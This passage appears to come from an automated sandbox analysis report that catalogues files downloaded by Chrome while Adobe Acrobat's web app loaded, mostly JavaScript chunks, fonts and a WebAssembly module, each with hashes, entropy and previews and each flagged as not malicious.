                                                      SHA-256:FF04077FD9C44E69C91EBE5F2AB0DC4FCD44B03DE6238E17337064279BCE0793
                                                      SHA-512:83EBFBC516449B09E78366AEBD57FDA7C497F40364F17BF5A6CC18A6B7052AEF22C4CF88DC30EBC3465CA4D48426E4FA09943B716478020F35C6BD920D3405D2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-sign-authoring2-dropin/3.59.4_4.1111.0/2895-chunk.js
                                                      Preview:/*! For license information please see 2895-chunk.js.LICENSE.txt */.(self["webpackJsonp-sign-authoring2"]=self["webpackJsonp-sign-authoring2"]||[]).push([[2895],{DFFk:function(t,o,i){"use strict";i.d(o,{G5:function(){return g},Qh:function(){return f},n$:function(){return m}});var c=i("npk1"),d=i("WCAd");const m={email:"",order:-1,role:c.U4z.EVERYONE,selected:!1,uuid:c.U4z.EVERYONE,memberInfos:[],colorCode:d.Z0[0],bgColor:d.Z0[1],borderColor:d.Z0[1],editable:!1},g={email:"",order:-2,role:c.U4z.ANYONE,selected:!1,uuid:c.U4z.ANYONE,memberInfos:[],colorCode:d.Nr[0],bgColor:d.Nr[1],borderColor:d.Nr[1],editable:!1},f={email:"",order:-3,role:c.U4z.PREFILL,selected:!1,uuid:c.U4z.PREFILL,memberInfos:[],colorCode:d.N$[0],bgColor:d.N$[1],borderColor:d.N$[0],editable:!1}},xn2o:function(t,o,i){"use strict";i.d(o,{C:function(){return c},x:function(){return d}});const c="createFieldsV2",d="deleteFieldsV2"},"0fgK":function(t,o,i){"use strict";i.d(o,{$s:function(){return d},Cz:function(){return m},_L:f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (37758), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):37760
                                                      Entropy (8bit):4.758151689738063
                                                      Encrypted:false
                                                      SSDEEP:384:LtvfvOCQvZk6Ct4tkfljwKGwbkckxcw2zZh8AthvGi/xm/tXe3glI7t1cCvWO1UJ:LtWjvRYuvokckxcvT84t1xEz0s4pZy
                                                      MD5:02545D9EF371B5D55CD4CF16BA6EEA1C
                                                      SHA1:45674A57F25CDEC540541421666990C8163C96A1
                                                      SHA-256:8D105F873F19327613D33FEBD74103D3699A7D6F34D00B9A83BAA8A422364201
                                                      SHA-512:1AAE3FFFAD4FA4C63448E48F735283A7F687ECD076B4553132FB4704BCC754742BDE3140D1DFF0BC5CD52FBC50316EEA7D281E81FFE5D0407BEF490B9BD61B50
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-sign-dropin/3.22.0_3.424.0/translations-[request]-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-sign"]=self["webpackJsonp-sign"]||[]).push([[3023],{t39f:e=>{e.exports=JSON.parse('{"agreement_already_expired.APPROVER":"This document has expired and can no longer be approved.","agreement_already_expired.SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_APPROVER":"This document has expired and can no longer be approved.","agreement_already_expired.ACCEPTOR":"This document has expired and can no longer be accepted.","agreement_already_expired.CERTIFIED_RECIPIENT":"This document has expired and its receipt can no longer be acknowledged.","agreement_already_expired.FORM_FILLER":"This document has expired and can no longer be filled.","agreement_already_expired.DELEGATE_TO_ACCEPTOR":"This document has expired and can no longer be accepted.","agreement_already_expired.DELEGATE_TO_CERTIFIED_RECIPIENT"
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7073)
                                                      Category:downloaded
                                                      Size (bytes):7133
                                                      Entropy (8bit):5.220423808708953
                                                      Encrypted:false
                                                      SSDEEP:192:W6x5bg/rxSkFKK1AYgss4YXvZrK0WUYEqUYg5rI4M3n6daP9sc4zjVkRR:WgerUk6hGGFC2hW4haP/n
                                                      MD5:117D01A049BB432290E57C6DA70572D7
                                                      SHA1:9D2E961B7804682B95BC5FDA9155837220EF306E
                                                      SHA-256:3D026CB828F7F5096A3A35D396EBB7B38E5577301C456189298CC106ECB5673C
                                                      SHA-512:78BB017B80E8F87B2760811938B421ED737C9B1C9E028B68FAAC7861692370F6212BFCE4A7BCB03FD6511646071D5188CC28D21523E778C4F5444FEEB01276F9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.94.0/tutorial-provider-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[3289],{KTWL:(e,t,o)=>{o.r(t),o.d(t,{default:()=>v});var i=o("plsW"),r=o("d369"),n=o("PO1Y"),l=o("9Bxo"),a=o("IYMA"),s={"edit-organize-demo":n.oe,"edit-organize-demo-v2":n.jO,"edit-organize-micro-demos":l.n,"onboarding-demo":a.L8},d=o("FXF0");function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}function _defineProperties(e,t){for(var o=0;o<t.length;o++){var i=t[o];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,_toPropertyKey(i.key),i)}}function _toPropertyKey(e){var t=function _toPrimitive(e,t){if("object"!=_typeof(e)||!e)return e;var o=e[Symbol.toPrimitive];if(void 0!==o){var i=o.call(e,t||"default");if("object"!=_typeof(i))return i;throw new
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (2369)
                                                      Category:downloaded
                                                      Size (bytes):18413
                                                      Entropy (8bit):5.569230065488367
                                                      Encrypted:false
                                                      SSDEEP:384:z12hpIgIVsUGiRm4lIeU4iDFeFs2NdFJsQF+i:zF7GiRm4X0JqsG7Ui
                                                      MD5:63EE68A1025BF11F112C621693B6B41A
                                                      SHA1:D219656D24A253695B167BCFCFEFD63397318011
                                                      SHA-256:1C4741C3C08428D4999ED2C77DEB909CF7BE4CBC6CB2161278A6CB7C8F8E337F
                                                      SHA-512:56EAE584F7B9B13262F5E91F01D957E5113064DDAF049C0E9667B07B1C460F1A2271F9737D9E1AB09741B9451B9C5BC434D701D85A9F19B638D7E536AF68FA8C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://use.typekit.net/bxf0ivf.js
                                                      Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017702. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. * - http://typekit.com/eulas/000000000000000000017704. * - http://typekit.com/eulas/000000000000000000017706. *. * . 2009-2025 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"19707152","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif",".tk-adobe-clean-condensed","\"adobe-clean-condensed\",sans-serif"],"fi":[7180,7181,7182,7184,7185,22474],"fc":[{"id":7180,"family":"adobe-clean","src":"https://use.typekit.net/af/cb695f/000000
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (3628)
                                                      Category:downloaded
                                                      Size (bytes):3633
                                                      Entropy (8bit):5.843676016758666
                                                      Encrypted:false
                                                      SSDEEP:96:gHalUFd66666r/MkWLdLoC38LWvJHeCXd7doHQffffo:pUFd66666rMZLoI8LWvJ+Sd7dy
                                                      MD5:5493550D27673D06E1DD6D724D586162
                                                      SHA1:E960FC91029E5F844BEF77C782399E9904D742A5
                                                      SHA-256:E47D4C22913B2B8A076C0B5361BBE0252F6D7E7B21D0FDA41A94E5951D58713D
                                                      SHA-512:607EE9A37F9CB6494733B9BF1A425535B818F005238A0866CF0E97DF8D7B98E24A4B1111C1E2515086CF62BC2EF65866BF32DE8A580E0B599A0E9DC7745DACDC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                      Preview:)]}'.["",["assassin creed shadows review embargo","playboi carti","manchester united ayden heaven injury","national hurricane center","spacex nasa astronauts","student loans repayment","nyt strands hints","ripple xrp news"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWMxeDNybmZiEg9BbWVyaWNhbiByYXBwZXIyiw9kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0F3RUJBUUFBQUFBQUFBQUFBQUFFQmdBREJRY0NBZi9FQURNUUFBSUJBZ1FEQmdVQ0J3QUFBQUFBQUFFQ0F3UVJBQVVTSVJNeFVRWVVJa0ZoY1lHUm9iSHdRc0VIRlJZeVVtTFIvOFFBR0FFQkFRRUJBUUFBQUFBQUFBQUFBQUFB
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (23672), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):23690
                                                      Entropy (8bit):5.12080415265133
                                                      Encrypted:false
                                                      SSDEEP:384:FFLmtDoAaKNTFOx6WJUZhuBY2dojxYyBi61ekPOuQQOOKm8XrDDWq+qtm:FVmtHuc7na+gkPO5QpKm8buL
                                                      MD5:62AC48FB2C6A07FA1890A4F8ABBFC036
                                                      SHA1:67860A8848F7BBCDA4778E2A7A2793089019DB59
                                                      SHA-256:FE8934B82BFAA705C679A4423A950C7859E86A9DD2B58E4CDB2573A0517F8BCB
                                                      SHA-512:67F4322B907AA29488888D6787B31F872598529DF0E3933A7518F31A8E4D28CE0162E41D2CEAB42B1FD770861DD541E30079D09CF291388A33975318408D94ED
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[3577],{R5i5:e=>{e.exports=JSON.parse('{"verb.fillsign.frictionless.description.seo":"Drag and drop a PDF to use the Acrobat PDF form filler."}')},t39f:e=>{e.exports=JSON.parse('{"fillsign.bootstrap.label":"Fill & Sign","fillsign.bootstrap.tooltip":"Fill and sign documents electronically","fillsign.bootstrap.modernViewer.tooltip":"Fill and sign your document or request e-signatures","fillsign.bootstrap.label.service":"Fill & Sign Service","verb.upload.error.only_accept_one_file":"Only one file can be uploaded at a time.","verb.upload.error.unsupported_type":"Unsupported file type.","verb.upload.error.file_too_large":"File too large.","verb.upload.error.empty_file":"This file is empty.","verb.upload.error.invalid_file":"Error with file upload. Your file may be corrupted or password protected.","verb.upload.error.max_page_count":"This file has too many pages to be processed. Maximum pages allowed: ","v
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):308250
                                                      Entropy (8bit):5.375696693857395
                                                      Encrypted:false
                                                      SSDEEP:3072:TcwZVo9NTbPyQRiUwVKInlGb1JKqovcXHQTy+o1JDZIXBOmLFAOsKL5GAHI:ToPyQRirzsJw5ojZKBOSLsKLMAHI
                                                      MD5:8201AF5AC4A768EA6081C1B54F87FFE0
                                                      SHA1:7C472C360D5EAA57DE5F106E62C2D1835EED280C
                                                      SHA-256:96E337C61AAD0D97576B4D10126A8E3082F19ACABB87C8A8934368A3DB97845C
                                                      SHA-512:6379C7178EF9B4EBE7FBF3FFF2208F1B8F243C3E547E5231AB6F1B6FA755A806E81F57BE09E71808897738BC7981E2EAA35CAC78AB10791FDAF1BB1E94958E2A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/home/006ad14344/799-1e38ac8c256ec2a78f96.js
                                                      Preview:!function(){try{var r="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new r.Error).stack;n&&(r._sentryDebugIds=r._sentryDebugIds||{},r._sentryDebugIds[n]="6038c57c-752e-4f87-bc6b-7be46595c5c9",r._sentryDebugIdIdentifier="sentry-dbid-6038c57c-752e-4f87-bc6b-7be46595c5c9")}catch(r){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"006ad143443732a31b79a885bb25ab6ae1f1d89a"},(self["webpackJsonp-dc-web-app"]=self["webpackJsonp-dc-web-app"]||[]).push([[799],{JGx2:(r,n,o)=>{"use strict";o.r(n),o.d(n,{Breadcrumbs:()=>xe,BrowserClient:()=>BrowserClient,BrowserProfilingIntegration:()=>_o,BrowserTracing:()=>BrowserTracing,Dedupe:()=>je,Feedback:()=>Feedback,FunctionToString:()=>a.$,GlobalHandlers:()=>Ne,HttpContext:()=>He,Hub:()=>c.YZ,InboundFilters:()=>l.H,Integrations:()=>wo,LinkedErrors:()=>ze,ModuleMetadata:()=>u.Y,Replay:()=>Replay$1,ReplayCa
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 38976, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):38976
                                                      Entropy (8bit):7.994496028599995
                                                      Encrypted:true
                                                      SSDEEP:768:s2oOMSxItxyTENn2VNQ6KTg0JPjswvX/7Q0DZ3tRRw/E/2lCtxe82J:s2oXS2H8g6Ks05Zs6Pz2
                                                      MD5:3DC8E6938118F5FA1AF3E7A5A98BAA66
                                                      SHA1:03CD9EE2CD0B7CD881FA75FF4A7369E68BD2154A
                                                      SHA-256:3D75BB0A01BC2FD0E963F6879634C371B205CA4DA67021B0F453592337DCC001
                                                      SHA-512:E54C11536A137510F0150C4A36001C81B2F8FF16E639FBC39E72218B1C5335CB3D43A7641DDF146E3CC0E7A338DC9D0F56006FE5659B91749F3C5C82A002F0DE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://use.typekit.net/af/4b3e87/000000000000000000017706/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n9&v=3
                                                      Preview:wOF2OTTO...@....................................F...*?DYNA.i?GDYN.Q..B.`..P...6.$..@....7. ..... ..q....CDE..E$..........W...?../~.....O...?.....E`...:.EuUd....Z...u..x.?.g..N3I..{.......XI*.I:.Z.hB.z...q.\....LT..1.ir.....@..@g6.L..yZ.X..Y...2....3.H...E...E.i..dedGV"..<.U.:5.\...'?...q...Ih?..!,.n...u`..cE.."k..r......d......4l..6o.[4...M..h..K........^...! ......`OL...S.I............!Bd.....O..o~...+.b.K$N.a.5-.$k:a.0...z'........F*....q.........Y..-q.a@.........s..@8(.qGA....#.$.B.T.n....Z...._.T......!..|...A..>....-x..d.._V...)...v..~&..L.i.'.?..]%o.'...I~..).~:L..@c..g...d....r.a....8.N...:;$..._ .x"..=.S......X..U-[~.MI.XF9.~S[.....?.............D`fW.f.s.b.......)JN..\.)u.j......E..!M+..^*.%@.@.l.o..V.f3&.a..I..%l....3..l.e.T..$'.3Y........Zl....).*.K-.=.T..........h]<.U....P...'.......i..D.Z...FA.m.B*\...\..b.{...hK..-}.......*?.T.].{V./~M....A;.OL.v.=.v@...d.j.....:...C....F"...%P.....9X..X....8........x..x.....T..R.jM..'. w.P..d.B
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:dropped
                                                      Size (bytes):4788873
                                                      Entropy (8bit):5.543501611557288
                                                      Encrypted:false
                                                      SSDEEP:24576:eVGVQG4T5Xqi+VthTr/Rf9j7DtBlmASbFCmAobF6bFLmAlb9Yb9qbFdbFtbF5bFf:eGXbR
                                                      MD5:B22A37A89E58B6F15418BC05CC8CF44E
                                                      SHA1:563EC89F6320C9B87E7F83AB8B9DEA0961BFEF55
                                                      SHA-256:7692FBC1F5A25AE379E5F19629418A77FAB64BD494428777BD5CA75BB5A1D597
                                                      SHA-512:613677AC02BAFFCC08344EAB7461D70009B0D24255CFD51DE71ABB9DF93736BEEBAFC10071630AD2DF8C6998899A7C7BDE74D31ADA562CF23748EA4BE4B1E124
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.asm.......dylink.0....H..]......`...`....`....`.....`.....`......`......`.......`.......`........`........`.........`..`.........`..........`..~.`...~`..........`...........`...`...}`..}.`..}..`..}}..`...~...`...........`...}..`....}.`............`..}...`..}...`.}.}`...~.`.}...`..}}}}..`....}`....~..`...}.`..~~~~.`.....}.`............`..~..~`.............`..~..`...~..`..~~..`.....~..`...~..`..............`..|.`...}..`.~...`.............`..}}..`..~.~`.}}.}`..~...`..}}.`......}.`..~...`..}..`...}}..`..}}}}}}..`.~~.~`..|`..|..`..~`...}.}`.|.}`.|..|`.}..`...}}}....`...}...`....~`......}}.`......~..`...............`.}.....`..~~.`......~`.....}`..}}}}}}}}...`...............`.................`..|......`.}..}`....~~..`....|..`.....~~..`.....|..`......~~..`.~..`...|`...|.|`..}}...`...}}}...`....~.~`..}}}}}}.`.~~~~..`..}}}.`..................`.....}..`........}}...`....}}}..`..~..~.`...}}}}}}}}...`....}}}}}}}}.`......}}....`...}}..`..~....`....||.....`.....~..`...}}.`..............}....`..}.}.}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12111)
                                                      Category:downloaded
                                                      Size (bytes):12158
                                                      Entropy (8bit):5.579747894924617
                                                      Encrypted:false
                                                      SSDEEP:192:OU/gXeyTAa37U812fa7Av64xUY2MSFNG5PUTxHGV9/9nhGWk3Z+AkQuVWtacy:b/Cey9I81Ka7ASJnJILAk/Itacy
                                                      MD5:1C1D454F35888874D0F6464A3B8F4F5A
                                                      SHA1:2D91A8E632B12F3F1606846C8C78200D87B4FEEB
                                                      SHA-256:143EEE56BF7F494EF423BD0C4CAD3651393398FF686C3399E9F122BA479BB4F8
                                                      SHA-512:C72A8689896819D756FFCCB7332A685FDF241976A6F060E9C989B6A1773B87D61FE0D071C0BF83ADE0B8E6BEB27EF5390115915F2D9684681CA0B4A8091DF156
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/5868-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[5868],{"32It":(e,t,a)=>{"use strict";a.d(t,{y:()=>useSignatureTool});var o=a("YWiy"),r=a("8dmp"),i=a("1ZEG"),n=a("6BuV"),l=a("ZAFT"),s=a("YDJZ"),d=a("fl0F"),c=a("B99j"),_=a("a3iC");const useSignatureTool=()=>{const[e,t]=(0,o.useState)(r.N.getSelectionType()),[a,g]=(0,o.useState)(null),[u,p]=(0,o.useState)(!1);(0,o.useEffect)((()=>{(async()=>{const e=await i.r$.getSignatures();p(!0),g(e)})().then((()=>{}));i.r$.addObserver((async e=>{let{action:t,field:a}=e;if(t===_.xj.SIGNATURES||t===_.xj.ADD_FIELD&&a.serverOp===_.U3.CREATE_FIELD&&[_.PU.SIGNATURE,_.PU.INITIALS].includes(a.type)){const e=await i.r$.getSignatures();g(e)}}))}),[]);return{selectedTool:e,setSelectedTool:t,sigData:a,setSigData:g,initialized:u,removeScribble:async e=>{const t=await i.r$.getSignatures(),a={};e===c.Lg.INITIALS?a[c.Lg.SIGNATURE]=t[c.Lg.SIGNATURE]:a[c.Lg.INITIALS]=t[c.Lg.INITIALS],g(a),i.r$.setSignatures(a),i.r$.deleteSignature(e).then((()
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):67
                                                      Entropy (8bit):4.507826086071084
                                                      Encrypted:false
                                                      SSDEEP:3:YGKeMfQ2pHWiR8Fj9GwupfFtOkOAh/:YGKed2pHDZZfOo/
                                                      MD5:19F7FE5FD15CFFCDBB687BF337E70CCC
                                                      SHA1:817251F23C4762E78D355AF65AD468F6FD9C86C1
                                                      SHA-256:2325A57C99FD96CFC9F0ADB6D1342E0FCE38C3E2CBD7620A379975033100663B
                                                      SHA-512:DBC757046CC6E154A7AF6D99DAF6796561A20E7860888C5133A6FA4B844DC65E36C5BB0B0F0353E87D52330996A618BA5D74C3F2484991897BAE3DD7A2CC08AE
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"country":"US","state": "NJ","Accept-Language" : "en-US,en;q=0.9"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1173)
                                                      Category:downloaded
                                                      Size (bytes):1213
                                                      Entropy (8bit):5.177643348101637
                                                      Encrypted:false
                                                      SSDEEP:24:jqlWDFrnXaPXAGccOwQhNN3+NyyQ6Ufy33htjARxsRbj3tT0H6UuXp:fxrnXyXAG9OwQDJcyfXyhmxsRjJ0H6J
                                                      MD5:8ED7F83FCEF2ACA74F07871A4C14F22A
                                                      SHA1:C5B0B21615C6647162E9F4BF24C2859C675EE796
                                                      SHA-256:8BF41BC3EA7DE1743DDB01DC9C00CCC86F33479F6F2AE3FE93139B4678913BE9
                                                      SHA-512:2EC3FC90BF2AA24E5D6916FBD433E36515788F651D52C97F3E20925FD231A0937944B270ED5730DAC5626A2A4867F4D40E0BA6E52C5ADDEABCFFE450B9F06100
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/611.js
                                                      Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[611],{xnjt:(e,t,s)=>{s.r(t),s.d(t,{default:()=>c});var n=s("YWiy"),r=s("/hLX"),o=s.n(r),i=s("plsW"),a=s("QyAB");function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var s=arguments[t];for(var n in s)Object.prototype.hasOwnProperty.call(s,n)&&(e[n]=s[n])}return e},_extends.apply(this,arguments)}const p=i.logging.getLogger("LoadDropinContainer"),c=(d=a.Z,(l=class extends n.Component{constructor(e){super(e),this.loadDropinAsNeeded=async()=>{const{dropinCls:e}=this.state;if(e)return;const{location:t}=this.props;if(!t)return;const s=i.router.getQueryParams(t.search),n=Object.entries(s).find((e=>{let[t,s]=e;return"load!dropin"===t?s:void 0}));if(n)try{const e=await i.discovery.loadDropinClass(n[1]);this.setState({dropinCls:e})}catch(e){p.error(e.stack||e.message)}},this.state={dropinCls:null}}componentDidMount(){this.loadDropinAsNeeded()}render
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (61122)
                                                      Category:downloaded
                                                      Size (bytes):61170
                                                      Entropy (8bit):5.555300214632906
                                                      Encrypted:false
                                                      SSDEEP:768:XFzS2JoKxylW/obaWwHLvfEdF9kPPEc7QIlMTZ5oQBwLvCARdMnZo4CueFRmRVnk:XFOyylS7zEdTk0P5oaE45w5iBBogbP8
                                                      MD5:43C2C23FF6A00A69F1696993DBFA9E7A
                                                      SHA1:C2DDCA718AFD3859C3B70B0E69A734CD1BAED427
                                                      SHA-256:1233EA47812ADD87A64BC270918E92CFDBE569DF55C92A384FD0FF4237E50320
                                                      SHA-512:7A070F04B3A9D345DC95411E567019C9412E2293EF76B26AE68C534A6197D31042372BF713ACC00379743E9887631C5FB192981A547D3FD583BDC62CF3029993
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files-dropin/3.18.0_2.64.0/bootstrap.js
                                                      Preview:(()=>{var e,t,r,n,o={"6jw6":(e,t,r)=>{e.exports=r("EtOT")},AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",n=e[3];if(!n)return r;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"/*# ".concat(r," */")}(n),i=n.sources.map((function(e){return"/*# sourceURL=".concat(n.sourceRoot||"").concat(e," */")}));return[r].concat(i).concat([o]).join("\n")}return[r].join("\n")}(t,e);return t[2]?"@media ".concat(t[2]," {").concat(r,"}"):r})).join("")},t.i=function(e,r,n){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(n)for(var i=0;i<this.length;i++){var a=this[i][0];null!=a&&(o[a]=!0)}for(var s=0;s<e.length;s++){var l=[].concat(e[s]);n&&o[l[0]]||(r&&(l[2]?l[2]="".concat(r," and ").concat(l[2]):l[2]=r),t.push(l))}},t}},qN0T
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (57865)
                                                      Category:downloaded
                                                      Size (bytes):57991
                                                      Entropy (8bit):5.441656276821162
                                                      Encrypted:false
                                                      SSDEEP:768:qNlJ8Ih5R4v0fsojVJQaZturbsxuzb75Ahbf:qNliIhkvAQMizb7If
                                                      MD5:E96EEB2B51899DEFE007247AA71B94B9
                                                      SHA1:1CD365635EDBE9425082774D879AD5D06B62BE02
                                                      SHA-256:519AB962DF6EFE9818027AC21ED7C34D41FD78BA05EF9DB12340F08446320588
                                                      SHA-512:B452B198FC3BBA638CA194ED095254CC685D74679DE58273158229FE7D4BBCAB468FD94E14851F71622690FFD73EB79240E8205B5B8D41E4EBF997B2B0360C59
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/rhpDropin-chunk.js
                                                      Preview:(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[3022],{GS0d:(e,t,n)=>{"use strict";var r=n("YWiy");e.exports=r.createElement("svg",{viewBox:"0 0 36 36"},r.createElement("path",{d:"M13.5 18a.5.5 0 0 1 .5.5v3a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5V20H8v10h1.5a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-5a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5H6V20H2v1.5a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-3a.5.5 0 0 1 .5-.5z"}),r.createElement("path",{d:"M9 4a1 1 0 0 0-1 1v6a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V8h8v20h-3a1 1 0 0 0-1 1v2a1 1 0 0 0 1 1h10a1 1 0 0 0 1-1v-2a1 1 0 0 0-1-1h-3V8h8v3a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1z"}))},VSe0:(e,t,n)=>{"use strict";var r=n("YWiy");e.exports=r.createElement("svg",{viewBox:"0 0 48 48"},r.createElement("path",{d:"M46 4H18a2 2 0 0 0-2 2v7a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V8h8v30h-3a1 1 0 0 0-1 1v2a1 1 0 0 0 1 1h14a1 1 0 0 0 1-1v-2a1 1 0 0 0-1-1h-3V8h8v5a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V6a2 2 0 0 0-2-2z"}),r.createElement("path",{d:"M19 18a1 1 0 0 1 1 1v6a1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):111622
                                                      Entropy (8bit):5.663659115296013
                                                      Encrypted:false
                                                      SSDEEP:1536:476eU/9XNzla6TMZP9gFC8MPLKQ+wtkFpFXJjhJwsIS+QN6N5MmQf9NFeCs:r/99zcGMZP9gFePtERISvN6N5Mf9NFeD
                                                      MD5:85B6B430495E7EF08E7E1520042B30B0
                                                      SHA1:0E4BBDE129413C304D836815795DB3DCE7257BE7
                                                      SHA-256:C8CC2A5E35D0263DE34908B0AF536C48CB971BF553C3928AF5410147D15F2092
                                                      SHA-512:A1BE4982F3AD79D9661C27C6929E94BFE7479931BC17195E92BD2AF439AD540D731181FAD585512D02629ABFE818B9B91E5AD5B7C993027BC8AE2812256E4377
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.80788bce779ed44eb31cc675c3cca874.js
